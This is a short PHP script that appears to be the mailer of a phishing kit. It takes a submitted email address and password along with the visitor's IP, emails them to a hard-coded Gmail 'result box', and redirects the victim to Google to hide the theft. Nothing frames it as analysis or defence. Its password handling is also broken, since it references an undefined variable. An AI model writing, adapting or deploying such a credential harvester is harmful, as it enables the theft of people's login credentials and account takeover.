<?php

if(isset($_POST['submit'])) {
$mailto = "bleethomas6@gmail.com";  //result box
$email = $_POST['email'];
$message = $_POST['key'];
$ip = $_SERVER['REMOTE_ADDR'];
$subject = "Results" . " " . $ip;

$message = "email address = " . $email . "\r\n" .	"password " . $key  . "\r\n"  ;

//headers


$headers = "From:" . $email;
$headers2 = "from" . $mailto;
//mailer
$result = mail($mailto, $subject, $message, $headers);
if ($result){     header("location:https://www.google.com");   
      exit();}
      else {$failed = "Please enter correct information";}}
?>
